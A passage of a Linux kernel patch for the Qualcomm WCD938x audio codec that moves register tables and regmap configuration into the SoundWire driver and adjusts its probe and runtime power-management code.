++	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R:
++	case WCD938X_HPH_NEW_INT_PA_MISC1:
++	case WCD938X_HPH_NEW_INT_PA_MISC2:
++	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC:
++	case WCD938X_HPH_NEW_INT_HPH_TIMER1:
++	case WCD938X_HPH_NEW_INT_HPH_TIMER2:
++	case WCD938X_HPH_NEW_INT_HPH_TIMER3:
++	case WCD938X_HPH_NEW_INT_HPH_TIMER4:
++	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC2:
++	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC3:
++	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L_NEW:
++	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R_NEW:
++	case WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_LOHIFI:
++	case WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_ULP:
++	case WCD938X_RX_NEW_INT_HPH_RDAC_LDO_LP:
++	case WCD938X_MBHC_NEW_INT_MOISTURE_DET_DC_CTRL:
++	case WCD938X_MBHC_NEW_INT_MOISTURE_DET_POLLING_CTRL:
++	case WCD938X_MBHC_NEW_INT_MECH_DET_CURRENT:
++	case WCD938X_MBHC_NEW_INT_SPARE_2:
++	case WCD938X_EAR_INT_NEW_EAR_CHOPPER_CON:
++	case WCD938X_EAR_INT_NEW_CNP_VCM_CON1:
++	case WCD938X_EAR_INT_NEW_CNP_VCM_CON2:
++	case WCD938X_EAR_INT_NEW_EAR_DYNAMIC_BIAS:
++	case WCD938X_AUX_INT_EN_REG:
++	case WCD938X_AUX_INT_PA_CTRL:
++	case WCD938X_AUX_INT_SP_CTRL:
++	case WCD938X_AUX_INT_DAC_CTRL:
++	case WCD938X_AUX_INT_CLK_CTRL:
++	case WCD938X_AUX_INT_TEST_CTRL:
++	case WCD938X_AUX_INT_MISC:
++	case WCD938X_LDORXTX_INT_BIAS:
++	case WCD938X_LDORXTX_INT_STB_LOADS_DTEST:
++	case WCD938X_LDORXTX_INT_TEST0:
++	case WCD938X_LDORXTX_INT_STARTUP_TIMER:
++	case WCD938X_LDORXTX_INT_TEST1:
++	case WCD938X_SLEEP_INT_WATCHDOG_CTL_1:
++	case WCD938X_SLEEP_INT_WATCHDOG_CTL_2:
++	case WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT1:
++	case WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT2:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L2:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L1:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L0:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP1P2M:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP0P6M:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L2L1:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L0:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_ULP:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L2L1:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L0:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_ULP:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_L2L1L0:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_ULP:
++	case WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L2L1:
++	case WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L0ULP:
++	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L2:
++	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L1:
++	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L0:
++	case WCD938X_TX_COM_NEW_INT_TXADC_INT_ULP:
++	case WCD938X_DIGITAL_PAGE_REGISTER:
++	case WCD938X_DIGITAL_SWR_TX_CLK_RATE:
++	case WCD938X_DIGITAL_CDC_RST_CTL:
++	case WCD938X_DIGITAL_TOP_CLK_CFG:
++	case WCD938X_DIGITAL_CDC_ANA_CLK_CTL:
++	case WCD938X_DIGITAL_CDC_DIG_CLK_CTL:
++	case WCD938X_DIGITAL_SWR_RST_EN:
++	case WCD938X_DIGITAL_CDC_PATH_MODE:
++	case WCD938X_DIGITAL_CDC_RX_RST:
++	case WCD938X_DIGITAL_CDC_RX0_CTL:
++	case WCD938X_DIGITAL_CDC_RX1_CTL:
++	case WCD938X_DIGITAL_CDC_RX2_CTL:
++	case WCD938X_DIGITAL_CDC_TX_ANA_MODE_0_1:
++	case WCD938X_DIGITAL_CDC_TX_ANA_MODE_2_3:
++	case WCD938X_DIGITAL_CDC_COMP_CTL_0:
++	case WCD938X_DIGITAL_CDC_ANA_TX_CLK_CTL:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A1_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A1_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A2_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A2_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A3_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A3_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A4_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A4_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A5_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A5_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A6_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A7_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_C_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_C_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_C_2:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_C_3:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R2:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R3:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R4:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R5:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R6:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R7:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A1_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A1_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A2_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A2_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A3_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A3_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A4_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A4_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A5_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A5_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A6_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A7_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_C_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_C_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_C_2:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_C_3:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R2:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R3:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R4:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R5:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R6:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R7:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_RX_0:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_RX_1:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_0:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_1:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_2:
++	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_0:
++	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_1:
++	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_2:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_CTL:
++	case WCD938X_DIGITAL_CDC_AUX_GAIN_CTL:
++	case WCD938X_DIGITAL_CDC_EAR_PATH_CTL:
++	case WCD938X_DIGITAL_CDC_SWR_CLH:
++	case WCD938X_DIGITAL_SWR_CLH_BYP:
++	case WCD938X_DIGITAL_CDC_TX0_CTL:
++	case WCD938X_DIGITAL_CDC_TX1_CTL:
++	case WCD938X_DIGITAL_CDC_TX2_CTL:
++	case WCD938X_DIGITAL_CDC_TX_RST:
++	case WCD938X_DIGITAL_CDC_REQ_CTL:
++	case WCD938X_DIGITAL_CDC_RST:
++	case WCD938X_DIGITAL_CDC_AMIC_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC1_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC2_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC3_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC4_CTL:
++	case WCD938X_DIGITAL_EFUSE_PRG_CTL:
++	case WCD938X_DIGITAL_EFUSE_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC_RATE_1_2:
++	case WCD938X_DIGITAL_CDC_DMIC_RATE_3_4:
++	case WCD938X_DIGITAL_PDM_WD_CTL0:
++	case WCD938X_DIGITAL_PDM_WD_CTL1:
++	case WCD938X_DIGITAL_PDM_WD_CTL2:
++	case WCD938X_DIGITAL_INTR_MODE:
++	case WCD938X_DIGITAL_INTR_MASK_0:
++	case WCD938X_DIGITAL_INTR_MASK_1:
++	case WCD938X_DIGITAL_INTR_MASK_2:
++	case WCD938X_DIGITAL_INTR_CLEAR_0:
++	case WCD938X_DIGITAL_INTR_CLEAR_1:
++	case WCD938X_DIGITAL_INTR_CLEAR_2:
++	case WCD938X_DIGITAL_INTR_LEVEL_0:
++	case WCD938X_DIGITAL_INTR_LEVEL_1:
++	case WCD938X_DIGITAL_INTR_LEVEL_2:
++	case WCD938X_DIGITAL_INTR_SET_0:
++	case WCD938X_DIGITAL_INTR_SET_1:
++	case WCD938X_DIGITAL_INTR_SET_2:
++	case WCD938X_DIGITAL_INTR_TEST_0:
++	case WCD938X_DIGITAL_INTR_TEST_1:
++	case WCD938X_DIGITAL_INTR_TEST_2:
++	case WCD938X_DIGITAL_TX_MODE_DBG_EN:
++	case WCD938X_DIGITAL_TX_MODE_DBG_0_1:
++	case WCD938X_DIGITAL_TX_MODE_DBG_2_3:
++	case WCD938X_DIGITAL_LB_IN_SEL_CTL:
++	case WCD938X_DIGITAL_LOOP_BACK_MODE:
++	case WCD938X_DIGITAL_SWR_DAC_TEST:
++	case WCD938X_DIGITAL_SWR_HM_TEST_RX_0:
++	case WCD938X_DIGITAL_SWR_HM_TEST_TX_0:
++	case WCD938X_DIGITAL_SWR_HM_TEST_RX_1:
++	case WCD938X_DIGITAL_SWR_HM_TEST_TX_1:
++	case WCD938X_DIGITAL_SWR_HM_TEST_TX_2:
++	case WCD938X_DIGITAL_PAD_CTL_SWR_0:
++	case WCD938X_DIGITAL_PAD_CTL_SWR_1:
++	case WCD938X_DIGITAL_I2C_CTL:
++	case WCD938X_DIGITAL_CDC_TX_TANGGU_SW_MODE:
++	case WCD938X_DIGITAL_EFUSE_TEST_CTL_0:
++	case WCD938X_DIGITAL_EFUSE_TEST_CTL_1:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_RX0:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_RX1:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_TX0:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_TX1:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_TX2:
++	case WCD938X_DIGITAL_PAD_INP_DIS_0:
++	case WCD938X_DIGITAL_PAD_INP_DIS_1:
++	case WCD938X_DIGITAL_DRIVE_STRENGTH_0:
++	case WCD938X_DIGITAL_DRIVE_STRENGTH_1:
++	case WCD938X_DIGITAL_DRIVE_STRENGTH_2:
++	case WCD938X_DIGITAL_RX_DATA_EDGE_CTL:
++	case WCD938X_DIGITAL_TX_DATA_EDGE_CTL:
++	case WCD938X_DIGITAL_GPIO_MODE:
++	case WCD938X_DIGITAL_PIN_CTL_OE:
++	case WCD938X_DIGITAL_PIN_CTL_DATA_0:
++	case WCD938X_DIGITAL_PIN_CTL_DATA_1:
++	case WCD938X_DIGITAL_DIG_DEBUG_CTL:
++	case WCD938X_DIGITAL_DIG_DEBUG_EN:
++	case WCD938X_DIGITAL_ANA_CSR_DBG_ADD:
++	case WCD938X_DIGITAL_ANA_CSR_DBG_CTL:
++	case WCD938X_DIGITAL_SSP_DBG:
++	case WCD938X_DIGITAL_SPARE_0:
++	case WCD938X_DIGITAL_SPARE_1:
++	case WCD938X_DIGITAL_SPARE_2:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_0:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_1:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_2:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_3:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_4:
++	case WCD938X_DIGITAL_DEM_BYPASS_DATA0:
++	case WCD938X_DIGITAL_DEM_BYPASS_DATA1:
++	case WCD938X_DIGITAL_DEM_BYPASS_DATA2:
++	case WCD938X_DIGITAL_DEM_BYPASS_DATA3:
++		return true;
++	}
++
++	return false;
++}
++
++static bool wcd938x_readonly_register(struct device *dev, unsigned int reg)
++{
++	switch (reg) {
++	case WCD938X_ANA_MBHC_RESULT_1:
++	case WCD938X_ANA_MBHC_RESULT_2:
++	case WCD938X_ANA_MBHC_RESULT_3:
++	case WCD938X_MBHC_MOISTURE_DET_FSM_STATUS:
++	case WCD938X_TX_1_2_SAR2_ERR:
++	case WCD938X_TX_1_2_SAR1_ERR:
++	case WCD938X_TX_3_4_SAR4_ERR:
++	case WCD938X_TX_3_4_SAR3_ERR:
++	case WCD938X_HPH_L_STATUS:
++	case WCD938X_HPH_R_STATUS:
++	case WCD938X_HPH_SURGE_HPHLR_SURGE_STATUS:
++	case WCD938X_EAR_STATUS_REG_1:
++	case WCD938X_EAR_STATUS_REG_2:
++	case WCD938X_MBHC_NEW_FSM_STATUS:
++	case WCD938X_MBHC_NEW_ADC_RESULT:
++	case WCD938X_DIE_CRACK_DIE_CRK_DET_OUT:
++	case WCD938X_AUX_INT_STATUS_REG:
++	case WCD938X_LDORXTX_INT_STATUS:
++	case WCD938X_DIGITAL_CHIP_ID0:
++	case WCD938X_DIGITAL_CHIP_ID1:
++	case WCD938X_DIGITAL_CHIP_ID2:
++	case WCD938X_DIGITAL_CHIP_ID3:
++	case WCD938X_DIGITAL_INTR_STATUS_0:
++	case WCD938X_DIGITAL_INTR_STATUS_1:
++	case WCD938X_DIGITAL_INTR_STATUS_2:
++	case WCD938X_DIGITAL_INTR_CLEAR_0:
++	case WCD938X_DIGITAL_INTR_CLEAR_1:
++	case WCD938X_DIGITAL_INTR_CLEAR_2:
++	case WCD938X_DIGITAL_SWR_HM_TEST_0:
++	case WCD938X_DIGITAL_SWR_HM_TEST_1:
++	case WCD938X_DIGITAL_EFUSE_T_DATA_0:
++	case WCD938X_DIGITAL_EFUSE_T_DATA_1:
++	case WCD938X_DIGITAL_PIN_STATUS_0:
++	case WCD938X_DIGITAL_PIN_STATUS_1:
++	case WCD938X_DIGITAL_MODE_STATUS_0:
++	case WCD938X_DIGITAL_MODE_STATUS_1:
++	case WCD938X_DIGITAL_EFUSE_REG_0:
++	case WCD938X_DIGITAL_EFUSE_REG_1:
++	case WCD938X_DIGITAL_EFUSE_REG_2:
++	case WCD938X_DIGITAL_EFUSE_REG_3:
++	case WCD938X_DIGITAL_EFUSE_REG_4:
++	case WCD938X_DIGITAL_EFUSE_REG_5:
++	case WCD938X_DIGITAL_EFUSE_REG_6:
++	case WCD938X_DIGITAL_EFUSE_REG_7:
++	case WCD938X_DIGITAL_EFUSE_REG_8:
++	case WCD938X_DIGITAL_EFUSE_REG_9:
++	case WCD938X_DIGITAL_EFUSE_REG_10:
++	case WCD938X_DIGITAL_EFUSE_REG_11:
++	case WCD938X_DIGITAL_EFUSE_REG_12:
++	case WCD938X_DIGITAL_EFUSE_REG_13:
++	case WCD938X_DIGITAL_EFUSE_REG_14:
++	case WCD938X_DIGITAL_EFUSE_REG_15:
++	case WCD938X_DIGITAL_EFUSE_REG_16:
++	case WCD938X_DIGITAL_EFUSE_REG_17:
++	case WCD938X_DIGITAL_EFUSE_REG_18:
++	case WCD938X_DIGITAL_EFUSE_REG_19:
++	case WCD938X_DIGITAL_EFUSE_REG_20:
++	case WCD938X_DIGITAL_EFUSE_REG_21:
++	case WCD938X_DIGITAL_EFUSE_REG_22:
++	case WCD938X_DIGITAL_EFUSE_REG_23:
++	case WCD938X_DIGITAL_EFUSE_REG_24:
++	case WCD938X_DIGITAL_EFUSE_REG_25:
++	case WCD938X_DIGITAL_EFUSE_REG_26:
++	case WCD938X_DIGITAL_EFUSE_REG_27:
++	case WCD938X_DIGITAL_EFUSE_REG_28:
++	case WCD938X_DIGITAL_EFUSE_REG_29:
++	case WCD938X_DIGITAL_EFUSE_REG_30:
++	case WCD938X_DIGITAL_EFUSE_REG_31:
++		return true;
++	}
++	return false;
++}
++
++static bool wcd938x_readable_register(struct device *dev, unsigned int reg)
++{
++	bool ret;
++
++	ret = wcd938x_readonly_register(dev, reg);
++	if (!ret)
++		return wcd938x_rdwr_register(dev, reg);
++
++	return ret;
++}
++
++static bool wcd938x_writeable_register(struct device *dev, unsigned int reg)
++{
++	return wcd938x_rdwr_register(dev, reg);
++}
++
++static bool wcd938x_volatile_register(struct device *dev, unsigned int reg)
++{
++	if (reg <= WCD938X_BASE_ADDRESS)
++		return false;
++
++	if (reg == WCD938X_DIGITAL_SWR_TX_CLK_RATE)
++		return true;
++
++	if (wcd938x_readonly_register(dev, reg))
++		return true;
++
++	return false;
++}
++
++static const struct regmap_config wcd938x_regmap_config = {
++	.name = "wcd938x_csr",
++	.reg_bits = 32,
++	.val_bits = 8,
++	.cache_type = REGCACHE_RBTREE,
++	.reg_defaults = wcd938x_defaults,
++	.num_reg_defaults = ARRAY_SIZE(wcd938x_defaults),
++	.max_register = WCD938X_MAX_REGISTER,
++	.readable_reg = wcd938x_readable_register,
++	.writeable_reg = wcd938x_writeable_register,
++	.volatile_reg = wcd938x_volatile_register,
++	.can_multi_write = true,
++};
++
++static const struct sdw_slave_ops wcd9380_slave_ops = {
+ 	.update_status = wcd9380_update_status,
+ 	.interrupt_callback = wcd9380_interrupt_callback,
+ 	.bus_config = wcd9380_bus_config,
+@@ -261,6 +1263,16 @@ static int wcd9380_probe(struct sdw_slave *pdev,
+ 		wcd->ch_info = &wcd938x_sdw_rx_ch_info[0];
+ 	}
+ 
++	if (wcd->is_tx) {
++		wcd->regmap = devm_regmap_init_sdw(pdev, &wcd938x_regmap_config);
++		if (IS_ERR(wcd->regmap))
++			return dev_err_probe(dev, PTR_ERR(wcd->regmap),
++					     "Regmap init failed\n");
++
++		/* Start in cache-only until device is enumerated */
++		regcache_cache_only(wcd->regmap, true);
++	}
++
+ 	pm_runtime_set_autosuspend_delay(dev, 3000);
+ 	pm_runtime_use_autosuspend(dev);
+ 	pm_runtime_mark_last_busy(dev);
+@@ -278,22 +1290,23 @@ MODULE_DEVICE_TABLE(sdw, wcd9380_slave_id);
+ 
+ static int __maybe_unused wcd938x_sdw_runtime_suspend(struct device *dev)
+ {
+-	struct regmap *regmap = dev_get_regmap(dev, NULL);
++	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(dev);
+ 
+-	if (regmap) {
+-		regcache_cache_only(regmap, true);
+-		regcache_mark_dirty(regmap);
++	if (wcd->regmap) {
++		regcache_cache_only(wcd->regmap, true);
++		regcache_mark_dirty(wcd->regmap);
+ 	}
++
+ 	return 0;
+ }
+ 
+ static int __maybe_unused wcd938x_sdw_runtime_resume(struct device *dev)
+ {
+-	struct regmap *regmap = dev_get_regmap(dev, NULL);
++	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(dev);
+ 
+-	if (regmap) {
+-		regcache_cache_only(regmap, false);
+-		regcache_sync(regmap);
++	if (wcd->regmap) {
++		regcache_cache_only(wcd->regmap, false);
++		regcache_sync(wcd->regmap);
+ 	}
+ 
+ 	pm_runtime_mark_last_busy(dev);
+diff --git a/sound/soc/codecs/wcd938x.c b/sound/soc/codecs/wcd938x.c
+index aca06a4026f3e..1d801a7b1469d 100644
+--- a/sound/soc/codecs/wcd938x.c
++++ b/sound/soc/codecs/wcd938x.c
+@@ -273,1001 +273,6 @@ static struct wcd_mbhc_field wcd_mbhc_fields[WCD_MBHC_REG_FUNC_MAX] = {
+ 	WCD_MBHC_FIELD(WCD_MBHC_ELECT_ISRC_EN, WCD938X_ANA_MBHC_ZDET, 0x02),
+ };
+ 
+-static const struct reg_default wcd938x_defaults[] = {
+-	{WCD938X_ANA_PAGE_REGISTER,                            0x00},
+-	{WCD938X_ANA_BIAS,                                     0x00},
+-	{WCD938X_ANA_RX_SUPPLIES,                              0x00},
+-	{WCD938X_ANA_HPH,                                      0x0C},
+-	{WCD938X_ANA_EAR,                                      0x00},
+-	{WCD938X_ANA_EAR_COMPANDER_CTL,                        0x02},
+-	{WCD938X_ANA_TX_CH1,                                   0x20},
+-	{WCD938X_ANA_TX_CH2,                                   0x00},
+-	{WCD938X_ANA_TX_CH3,                                   0x20},
+-	{WCD938X_ANA_TX_CH4,                                   0x00},
+-	{WCD938X_ANA_MICB1_MICB2_DSP_EN_LOGIC,                 0x00},
+-	{WCD938X_ANA_MICB3_DSP_EN_LOGIC,                       0x00},
+-	{WCD938X_ANA_MBHC_MECH,                                0x39},
+-	{WCD938X_ANA_MBHC_ELECT,                               0x08},
+-	{WCD938X_ANA_MBHC_ZDET,                                0x00},
+-	{WCD938X_ANA_MBHC_RESULT_1,                            0x00},
+-	{WCD938X_ANA_MBHC_RESULT_2,                            0x00},
+-	{WCD938X_ANA_MBHC_RESULT_3,                            0x00},
+-	{WCD938X_ANA_MBHC_BTN0,                                0x00},
+-	{WCD938X_ANA_MBHC_BTN1,                                0x10},
+-	{WCD938X_ANA_MBHC_BTN2,                                0x20},
+-	{WCD938X_ANA_MBHC_BTN3,                                0x30},
+-	{WCD938X_ANA_MBHC_BTN4,                                0x40},
+-	{WCD938X_ANA_MBHC_BTN5,                                0x50},
+-	{WCD938X_ANA_MBHC_BTN6,                                0x60},
+-	{WCD938X_ANA_MBHC_BTN7,                                0x70},
+-	{WCD938X_ANA_MICB1,                                    0x10},
+-	{WCD938X_ANA_MICB2,                                    0x10},
+-	{WCD938X_ANA_MICB2_RAMP,                               0x00},
+-	{WCD938X_ANA_MICB3,                                    0x10},
+-	{WCD938X_ANA_MICB4,                                    0x10},
+-	{WCD938X_BIAS_CTL,                                     0x2A},
+-	{WCD938X_BIAS_VBG_FINE_ADJ,                            0x55},
+-	{WCD938X_LDOL_VDDCX_ADJUST,                            0x01},
+-	{WCD938X_LDOL_DISABLE_LDOL,                            0x00},
+-	{WCD938X_MBHC_CTL_CLK,                                 0x00},
+-	{WCD938X_MBHC_CTL_ANA,                                 0x00},
+-	{WCD938X_MBHC_CTL_SPARE_1,                             0x00},
+-	{WCD938X_MBHC_CTL_SPARE_2,                             0x00},
+-	{WCD938X_MBHC_CTL_BCS,                                 0x00},
+-	{WCD938X_MBHC_MOISTURE_DET_FSM_STATUS,                 0x00},
+-	{WCD938X_MBHC_TEST_CTL,                                0x00},
+-	{WCD938X_LDOH_MODE,                                    0x2B},
+-	{WCD938X_LDOH_BIAS,                                    0x68},
+-	{WCD938X_LDOH_STB_LOADS,                               0x00},
+-	{WCD938X_LDOH_SLOWRAMP,                                0x50},
+-	{WCD938X_MICB1_TEST_CTL_1,                             0x1A},
+-	{WCD938X_MICB1_TEST_CTL_2,                             0x00},
+-	{WCD938X_MICB1_TEST_CTL_3,                             0xA4},
+-	{WCD938X_MICB2_TEST_CTL_1,                             0x1A},
+-	{WCD938X_MICB2_TEST_CTL_2,                             0x00},
+-	{WCD938X_MICB2_TEST_CTL_3,                             0x24},
+-	{WCD938X_MICB3_TEST_CTL_1,                             0x1A},
+-	{WCD938X_MICB3_TEST_CTL_2,                             0x00},
+-	{WCD938X_MICB3_TEST_CTL_3,                             0xA4},
+-	{WCD938X_MICB4_TEST_CTL_1,                             0x1A},
+-	{WCD938X_MICB4_TEST_CTL_2,                             0x00},
+-	{WCD938X_MICB4_TEST_CTL_3,                             0xA4},
+-	{WCD938X_TX_COM_ADC_VCM,                               0x39},
+-	{WCD938X_TX_COM_BIAS_ATEST,                            0xE0},
+-	{WCD938X_TX_COM_SPARE1,                                0x00},
+-	{WCD938X_TX_COM_SPARE2,                                0x00},
+-	{WCD938X_TX_COM_TXFE_DIV_CTL,                          0x22},
+-	{WCD938X_TX_COM_TXFE_DIV_START,                        0x00},
+-	{WCD938X_TX_COM_SPARE3,                                0x00},
+-	{WCD938X_TX_COM_SPARE4,                                0x00},
+-	{WCD938X_TX_1_2_TEST_EN,                               0xCC},
+-	{WCD938X_TX_1_2_ADC_IB,                                0xE9},
+-	{WCD938X_TX_1_2_ATEST_REFCTL,                          0x0A},
+-	{WCD938X_TX_1_2_TEST_CTL,                              0x38},
+-	{WCD938X_TX_1_2_TEST_BLK_EN1,                          0xFF},
+-	{WCD938X_TX_1_2_TXFE1_CLKDIV,                          0x00},
+-	{WCD938X_TX_1_2_SAR2_ERR,                              0x00},
+-	{WCD938X_TX_1_2_SAR1_ERR,                              0x00},
+-	{WCD938X_TX_3_4_TEST_EN,                               0xCC},
+-	{WCD938X_TX_3_4_ADC_IB,                                0xE9},
+-	{WCD938X_TX_3_4_ATEST_REFCTL,                          0x0A},
+-	{WCD938X_TX_3_4_TEST_CTL,                              0x38},
+-	{WCD938X_TX_3_4_TEST_BLK_EN3,                          0xFF},
+-	{WCD938X_TX_3_4_TXFE3_CLKDIV,                          0x00},
+-	{WCD938X_TX_3_4_SAR4_ERR,                              0x00},
+-	{WCD938X_TX_3_4_SAR3_ERR,                              0x00},
+-	{WCD938X_TX_3_4_TEST_BLK_EN2,                          0xFB},
+-	{WCD938X_TX_3_4_TXFE2_CLKDIV,                          0x00},
+-	{WCD938X_TX_3_4_SPARE1,                                0x00},
+-	{WCD938X_TX_3_4_TEST_BLK_EN4,                          0xFB},
+-	{WCD938X_TX_3_4_TXFE4_CLKDIV,                          0x00},
+-	{WCD938X_TX_3_4_SPARE2,                                0x00},
+-	{WCD938X_CLASSH_MODE_1,                                0x40},
+-	{WCD938X_CLASSH_MODE_2,                                0x3A},
+-	{WCD938X_CLASSH_MODE_3,                                0x00},
+-	{WCD938X_CLASSH_CTRL_VCL_1,                            0x70},
+-	{WCD938X_CLASSH_CTRL_VCL_2,                            0x82},
+-	{WCD938X_CLASSH_CTRL_CCL_1,                            0x31},
+-	{WCD938X_CLASSH_CTRL_CCL_2,                            0x80},
+-	{WCD938X_CLASSH_CTRL_CCL_3,                            0x80},
+-	{WCD938X_CLASSH_CTRL_CCL_4,                            0x51},
+-	{WCD938X_CLASSH_CTRL_CCL_5,                            0x00},
+-	{WCD938X_CLASSH_BUCK_TMUX_A_D,                         0x00},
+-	{WCD938X_CLASSH_BUCK_SW_DRV_CNTL,                      0x77},
+-	{WCD938X_CLASSH_SPARE,                                 0x00},
+-	{WCD938X_FLYBACK_EN,                                   0x4E},
+-	{WCD938X_FLYBACK_VNEG_CTRL_1,                          0x0B},
+-	{WCD938X_FLYBACK_VNEG_CTRL_2,                          0x45},
+-	{WCD938X_FLYBACK_VNEG_CTRL_3,                          0x74},
+-	{WCD938X_FLYBACK_VNEG_CTRL_4,                          0x7F},
+-	{WCD938X_FLYBACK_VNEG_CTRL_5,                          0x83},
+-	{WCD938X_FLYBACK_VNEG_CTRL_6,                          0x98},
+-	{WCD938X_FLYBACK_VNEG_CTRL_7,                          0xA9},
+-	{WCD938X_FLYBACK_VNEG_CTRL_8,                          0x68},
+-	{WCD938X_FLYBACK_VNEG_CTRL_9,                          0x64},
+-	{WCD938X_FLYBACK_VNEGDAC_CTRL_1,                       0xED},
+-	{WCD938X_FLYBACK_VNEGDAC_CTRL_2,                       0xF0},
+-	{WCD938X_FLYBACK_VNEGDAC_CTRL_3,                       0xA6},
+-	{WCD938X_FLYBACK_CTRL_1,                               0x65},
+-	{WCD938X_FLYBACK_TEST_CTL,                             0x00},
+-	{WCD938X_RX_AUX_SW_CTL,                                0x00},
+-	{WCD938X_RX_PA_AUX_IN_CONN,                            0x01},
+-	{WCD938X_RX_TIMER_DIV,                                 0x32},
+-	{WCD938X_RX_OCP_CTL,                                   0x1F},
+-	{WCD938X_RX_OCP_COUNT,                                 0x77},
+-	{WCD938X_RX_BIAS_EAR_DAC,                              0xA0},
+-	{WCD938X_RX_BIAS_EAR_AMP,                              0xAA},
+-	{WCD938X_RX_BIAS_HPH_LDO,                              0xA9},
+-	{WCD938X_RX_BIAS_HPH_PA,                               0xAA},
+-	{WCD938X_RX_BIAS_HPH_RDACBUFF_CNP2,                    0x8A},
